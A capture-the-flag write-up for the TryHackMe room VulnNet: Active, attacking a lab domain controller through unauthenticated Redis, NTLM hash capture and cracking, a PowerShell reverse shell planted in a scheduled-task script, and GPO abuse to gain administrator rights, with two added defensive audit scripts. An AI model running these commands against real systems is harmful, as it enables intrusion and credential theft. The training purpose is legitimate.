VulnNet: Active [THM]
TryHackMe - VulnNet: Active - Write-Up
Port scan
Let's start off by performing a port scan against the target system.
┌──(n㉿kali)-[~]
└─$ nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12
# Nmap 7.91 scan initiated Sun Aug 1 15:06:30 2021 as: nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12
Nmap scan report for 10.10.188.12
Host is up, received user-set (0.055s latency).
Scanned at 2021-08-01 15:06:30 CEST for 187s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
6379/tcp open redis syn-ack Redis key-value store 2.8.2402
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49695/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 9176/tcp): CLEAN (Timeout)
| Check 2 (port 50061/tcp): CLEAN (Timeout)
| Check 3 (port 54977/udp): CLEAN (Timeout)
| Check 4 (port 50181/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-01T13:08:59
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 1 15:09:37 2021 -- 1 IP address (1 host up) scanned in 187.42 seconds
Interesting ports: 139, 445 (SMB) and 6379 (Redis).
SMB enumeration
Maybe SMB will disclose some useful information. Simply connecting to the target machine with smbclient doesn't help much: anonymous login succeeds, but no shares are listed.
┌──(n㉿kali)-[~]
└─$ smbclient -L \\\\10.10.188.12
Enter WORKGROUP\n's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
However, crackmapexec at least reveals the hostname and the domain name.
┌──(n㉿kali)-[~]
└─$ crackmapexec smb 10.10.188.12
SMB 10.10.188.12 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
Redis enumeration
A quick Google search reveals that Redis is an in-memory data structure store used as a database, cache, and message broker.
Using redis-cli, we can query the instance for information. Note that the connection is accepted without any authentication.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ redis-cli -h 10.10.188.12
10.10.188.12:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:3252
run_id:c281e091e328ed486243adaf6bc305583228de06
tcp_port:6379
uptime_in_seconds:2708
uptime_in_days:0
hz:10
lru_clock:435938
config_file:
# Clients
connected_clients:3
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:987760
used_memory_human:964.61K
used_memory_rss:954216
used_memory_peak:987760
used_memory_peak_human:964.61K
used_memory_lua:36864
mem_fragmentation_ratio:0.97
mem_allocator:dlmalloc-2.8
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1627823182
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:9
total_commands_processed:12
instantaneous_ops_per_sec:0
total_net_input_bytes:283
total_net_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.08
used_cpu_user:0.20
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace
10.10.188.12:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "unixsocket"
8) ""
9) "logfile"
10) ""
11) "pidfile"
12) "/var/run/redis.pid"
13) "maxmemory"
14) "0"
15) "maxmemory-samples"
16) "3"
17) "timeout"
18) "0"
19) "tcp-keepalive"
20) "0"
21) "auto-aof-rewrite-percentage"
22) "100"
23) "auto-aof-rewrite-min-size"
24) "67108864"
25) "hash-max-ziplist-entries"
26) "512"
27) "hash-max-ziplist-value"
28) "64"
29) "list-max-ziplist-entries"
30) "512"
31) "list-max-ziplist-value"
32) "64"
33) "set-max-intset-entries"
34) "512"
35) "zset-max-ziplist-entries"
36) "128"
37) "zset-max-ziplist-value"
38) "64"
39) "hll-sparse-max-bytes"
40) "3000"
41) "lua-time-limit"
42) "5000"
43) "slowlog-log-slower-than"
44) "10000"
45) "latency-monitor-threshold"
46) "0"
47) "slowlog-max-len"
48) "128"
49) "port"
50) "6379"
51) "tcp-backlog"
52) "511"
53) "databases"
54) "16"
55) "repl-ping-slave-period"
56) "10"
57) "repl-timeout"
58) "60"
59) "repl-backlog-size"
60) "1048576"
61) "repl-backlog-ttl"
62) "3600"
63) "maxclients"
64) "10000"
65) "watchdog-period"
66) "0"
67) "slave-priority"
68) "100"
69) "min-slaves-to-write"
70) "0"
71) "min-slaves-max-lag"
72) "10"
73) "hz"
74) "10"
75) "repl-diskless-sync-delay"
76) "5"
77) "no-appendfsync-on-rewrite"
78) "no"
79) "slave-serve-stale-data"
80) "yes"
81) "slave-read-only"
82) "yes"
83) "stop-writes-on-bgsave-error"
84) "yes"
85) "daemonize"
86) "no"
87) "rdbcompression"
88) "yes"
89) "rdbchecksum"
90) "yes"
91) "activerehashing"
92) "yes"
93) "repl-disable-tcp-nodelay"
94) "no"
95) "repl-diskless-sync"
96) "no"
97) "aof-rewrite-incremental-fsync"
98) "yes"
99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "jd 3600 jd 300 jd 60"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) ""
121) "bind"
122) ""
Scrolling through the output of the different commands, we stumble across the "dir" path, which contains a username.
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
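As a defender's check, added here and not part of the original write-up: the script below parses the INFO and CONFIG GET * replies shown above (a constructed excerpt is embedded) and reports the settings that made this instance enumerable, together with the redis.conf directive that closes each gap. The finding codes and REMEDIATION texts are my own naming.

```python
import re

# Constructed excerpt of the redis-cli replies shown above (the INFO "# Server"
# section and the numbered CONFIG GET * list); only the lines the audit reads.
INFO_SAMPLE = """# Server
redis_version:2.8.2402
os:Windows
"""
CONFIG_SAMPLE = r"""3) "requirepass"
4) ""
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
121) "bind"
122) ""
"""

_CONFIG_LINE = re.compile(r'^\s*\d+\)\s+"(.*)"\s*$')
_PROFILE_DIR = re.compile(r"[\\/]+Users[\\/]+([^\\/]+)[\\/]", re.I)

# redis.conf directive (or action) that closes each finding code.
REMEDIATION = {
    "no-auth": "set requirepass (and on Redis 6+ define least-privilege ACL users)",
    "all-interfaces": "bind 127.0.0.1 or the single interface trusted clients use",
    "no-protected-mode": "upgrade past 3.2; meanwhile firewall 6379 to known clients",
    "user-profile-dir": "install in a dedicated service directory under a service account",
    "legacy-2x": 'rename-command EVAL "" and rename-command CONFIG "" until upgraded',
}

def parse_info(text):
    """Parse INFO output into a dict, skipping '# Section' headers and blank lines."""
    lines = (l.strip() for l in text.splitlines())
    return dict(l.partition(":")[::2] for l in lines if l and not l.startswith("#"))

def parse_config_get(text):
    """Turn the numbered flat CONFIG GET reply into {directive: value}."""
    values = [m.group(1) for m in map(_CONFIG_LINE.match, text.splitlines()) if m]
    if len(values) % 2:
        raise ValueError("CONFIG GET reply must alternate key/value")
    return dict(zip(values[0::2], values[1::2]))

def audit_redis(info, config):
    """Return (code, detail) pairs for the exposure conditions seen in the write-up."""
    findings = []
    if not config.get("requirepass"):
        findings.append(("no-auth", "requirepass is empty: commands run without a password"))
    if not config.get("bind"):
        findings.append(("all-interfaces", "bind is empty: the port listens on every interface"))
    if "protected-mode" not in config:
        findings.append(("no-protected-mode", "build predates protected-mode (Redis 3.2), so "
                         "unauthenticated remote clients are not refused by default"))
    m = _PROFILE_DIR.search(config.get("dir", ""))
    if m:
        findings.append(("user-profile-dir", f"data dir sits in the profile of {m.group(1)!r}, "
                         "which discloses an account name to any client"))
    if int(info.get("redis_version", "0").split(".")[0]) <= 2:
        findings.append(("legacy-2x", f"redis_version {info['redis_version']}: EVAL and CONFIG "
                         "are reachable unauthenticated on this build"))
    return findings

if __name__ == "__main__":
    for code, detail in audit_redis(parse_info(INFO_SAMPLE), parse_config_get(CONFIG_SAMPLE)):
        print(f"[{code}] {detail}\n    fix: {REMEDIATION[code]}")
```

Pointing the two parsers at the full output of a live instance works the same way, since redis-cli prints CONFIG GET as the same numbered flat list.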
Obtaining the user flag
After hours of research, it turns out that Redis can execute sandboxed Lua scripts through the EVAL command. Lua's dofile() function reads and executes a file, which makes it usable for enumerating files and directories, and older Redis versions do not block it in the sandbox.
If the target file is not valid Lua (or tries to set global variables), the interpreter's error message leaks part of its contents.
Why not try reading the user.txt file?
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED'
Source: Red Team Diary, Entry #2: Stealthily Backdooring CMS Through Redis’ Memory Space
Capturing NTLMv2 hash
Maybe there is a way to capture an NTLM hash? Let's give that a try by running Responder.
┌──(n㉿kali)-[~]
└─$ sudo responder -I tun0
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.1.246]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MJ06EI78D1C]
Responder Domain Name [7KD0.LOCAL]
Responder DCE-RPC Port [45088]
[+] Listening for events...
Using the EVAL command with a UNC path, we can make the target system connect back to our machine, where Responder answers the SMB authentication.
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('//10.9.1.246//share')" 0
(error) ERR Error running script (call to f_3d1b58af3586d137babc26eb9ef689a682da5aef): @user_script:1: cannot open //10.9.1.246//oof: Invalid argument
We captured a hash!
[SMB] NTLMv2-SSP Client : 10.10.188.12
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash : enterprise-security::VULNNET:8384dad31c118aef:615A31F98510A3488251629F7D84FF7C:010004EA4..........
Cracking NTLMv2 hash
Let's get cracking!
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ hashcat -a0 -m 5600 hash.hash /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
ENTERPRISE-SECURITY::enterprise-security::VULNNET:8384dad31c118aef:615A31F98510A3488251629F7D84FF7C:010004EA4..........:PASSWORD-REDACTED
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: ENTERPRISE-SECURITY::VULNNET:8384dad31c118aef:615a3...000000
Time.Started.....: Wed Aug 4 22:26:07 2021 (1 sec)
Time.Estimated...: Wed Aug 4 22:26:08 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 23233.5 kH/s (9.47ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 5898240/14344384 (41.12%)
Rejected.........: 0/5898240 (0.00%)
Restore.Point....: 3932160/14344384 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford12 -> madru_gada
Hardware.Mon.#1..: Temp: 48c Util: 18% Core:1890MHz Mem:5000MHz Bus:8
More SMB enumeration
Using the username and password we found earlier, we can try enumerating SMB again.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient -L \\\\10.10.188.12 -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Let's check out the Enterprise-Share share.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 23 23:45:41 2021
.. D 0 Tue Feb 23 23:45:41 2021
PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 01:33:18 2021
9558271 blocks of size 4096. 4996387 blocks available
The PurgeIrrelevantData_1826.ps1 script seems to be part of some scheduled task.
Setting up a Netcat listener
I wonder if we can spawn a shell by overwriting the contents of this ps1 file.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
Command Injection - Powershell
Let's modify the contents of PurgeIrrelevantData_1826.ps1 so that it will spawn a shell for us.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ cat PurgeIrrelevantData_1826.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.9.1.246',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Source: PayloadsAllTheThings Cheatsheet Reverse Shell Powershell
We can overwrite the file with our edited version of the script on the target machine.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (4.3 kb/s) (average 4.3 kb/s)
smb: \> put nc.exe
putting file nc.exe as \nc.exe (288.6 kb/s) (average 186.3 kb/s)
I also uploaded the Netcat executable, since I didn't receive any STDERR / STDOUT while enumerating the machine using PowerShell.
Receiving a shell
WE GOT A SHELL!
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 49872
whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads>
A more stable shell
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...
PS C:\enterprise-share> Start-Process -FilePath "C:\enterprise-share\nc.exe" -ArgumentList "-nv 10.9.1.246 6666 -e powershell.exe"
Necessary? No. But definitely helpful when you accidentally exit out of your shell.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 50037
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\enterprise-share>
PowerView - enumeration
After hours of enumeration, I found something interesting: two GPOs, security-pol-vn and Default Domain Controllers Policy.
PS C:\enterprise-share> get-netgpo
get-netgpo
flags : 0
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 2/23/2021 11:09:44 PM
versionnumber : 3
systemflags : -1946157056
objectguid : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
showinadvancedviewonly : True
usnchanged : 20506
dscorepropagationdata : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
displayname : security-pol-vn
gpcfunctionalityversion : 2
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
usncreated : 5672
whencreated : 2/23/2021 9:30:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
flags : 0
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 2/24/2021 12:14:52 AM
versionnumber : 4
systemflags : -1946157056
objectguid : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
showinadvancedviewonly : True
usnchanged : 24594
dscorepropagationdata : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
displayname : Default Domain Controllers Policy
gpcfunctionalityversion : 2
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
usncreated : 5675
whencreated : 2/23/2021 9:30:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
BloodHound - enumeration
Let's get graphical!
PS C:\enterprise-share> .\sharphound.exe
----------------------------------------------
Initializing SharpHound at 1:49 PM on 8/4/2021
----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain VULNNET.LOCAL using path CN=Schema,CN=Configuration,DC=vulnnet,DC=local
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 59 objects finished (+59 59)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.1978320
Compressing data to .\20210804134951_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 1:49 PM on 8/4/2021! Happy Graphing!
Shortest Path to Domain Admin
Querying BloodHound, we find that our enterprise-security user has GenericWrite on the security-pol-vn GPO, which is applied to essentially all objects within the vulnnet.local domain.
Maybe we can exploit this misconfiguration... Let's find out!
Abusing GPO permissions
Let's see what we can do to escalate our privileges.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
We can try adding the enterprise-security user to the local Administrators group with a tool called SharpGPOAbuse, which writes an immediate scheduled task into the GPO we control.
PS C:\enterprise-share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\enterprise-share> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Let's review our group memberships after forcing a policy update on the target machine.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
There we go! The enterprise-security account is now a local administrator.
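A defender's counterpart to the step above, added here and not part of the original write-up: the script walks a SYSVOL tree for Group Policy Preferences ScheduledTasks.xml files (the file SharpGPOAbuse wrote under the security-pol-vn policy) and reports each task, flagging immediate tasks and local-group changes. The XML sample is constructed and modelled on the GPP schema, the SYSVOL tree is built in a temporary directory, and SUSPICIOUS_ARGS is my own heuristic.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Constructed ScheduledTasks.xml modelled on the Group Policy Preferences schema.
# Task name, author, command and arguments are the ones from the SharpGPOAbuse run
# above; a real file carries more Settings/Triggers elements than shown here.
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="Debug">
    <Properties action="C" name="Debug" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>vulnnet\\administrator</Author></RegistrationInfo>
        <Actions Context="Author"><Exec><Command>cmd.exe</Command>
          <Arguments>/c net localgroup administrators enterprise-security /add</Arguments>
        </Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""
GPO_GUID = "{31B2F340-016D-11D2-945F-00C04FB984F9}"  # security-pol-vn, from the write-up

# Argument patterns worth an alert: local group changes, shells, encoded commands.
SUSPICIOUS_ARGS = re.compile(r"net1?\s+(localgroup|group)\b.*/add\b|powershell|-enc\b|cmd(\.exe)?\s+/c", re.I)

def scan_sysvol(sysvol_root):
    """Walk a SYSVOL tree and report every GPP scheduled task found in any policy."""
    hits = []
    for dirpath, _, files in os.walk(sysvol_root):
        if "ScheduledTasks.xml" not in files:
            continue
        gpo = next((p for p in dirpath.split(os.sep) if p.startswith("{")), "?")
        for task in ET.parse(os.path.join(dirpath, "ScheduledTasks.xml")).getroot():
            props = task.find("Properties")
            ex = task.find("Properties/Task/Actions/Exec")
            cmd = ex.findtext("Command", "") if ex is not None else ""
            args = ex.findtext("Arguments", "") if ex is not None else ""
            hits.append({
                "gpo": gpo,
                "kind": task.tag,  # ImmediateTaskV2 fires at the next policy refresh
                "name": task.get("name", ""),
                "run_as": props.get("runAs", "") if props is not None else "",
                "author": task.findtext("Properties/Task/RegistrationInfo/Author", ""),
                "command": f"{cmd} {args}".strip(),
                "suspicious": task.tag == "ImmediateTaskV2" or bool(SUSPICIOUS_ARGS.search(args)),
            })
    return hits

def build_demo_sysvol():
    """Write SAMPLE_XML at the path SharpGPOAbuse used, under a temp SYSVOL root."""
    root = tempfile.mkdtemp(prefix="sysvol-")
    gpo_dir = os.path.join(root, "vulnnet.local", "Policies", GPO_GUID,
                           "Machine", "Preferences", "ScheduledTasks")
    os.makedirs(gpo_dir)
    with open(os.path.join(gpo_dir, "ScheduledTasks.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_XML)
    return root

if __name__ == "__main__":
    for hit in scan_sysvol(build_demo_sysvol()):
        flag = "ALERT" if hit["suspicious"] else "info"
        print(f"{flag} {hit['gpo']} {hit['kind']} '{hit['name']}' as {hit['run_as']}: {hit['command']}")
```

Run against a mounted copy of \\<domain>\SYSVOL (or the DC's own SYSVOL folder) the same scan surfaces any policy that carries a preference task, and a versionNumber bump on a GPO with no matching change ticket is the corroborating signal.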
Obtaining the system flag
Now that we have more privileges, let's access the C$ share and grab the system.txt file.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\C$ -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
smb: \users\Administrator\Desktop\> ls
. DR 0 Wed Feb 24 05:27:33 2021
.. DR 0 Wed Feb 24 05:27:33 2021
desktop.ini AHS 282 Mon Feb 22 22:55:21 2021
system.txt A 37 Wed Feb 24 05:27:45 2021
9558271 blocks of size 4096. 5011466 blocks available
smb: \users\Administrator\Desktop\> mget system.txt
Get file system.txt? y
getting file \users\Administrator\Desktop\system.txt of size 37 as system.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ cat system.txt
THM{FLAG-REDACTED}
Pwned!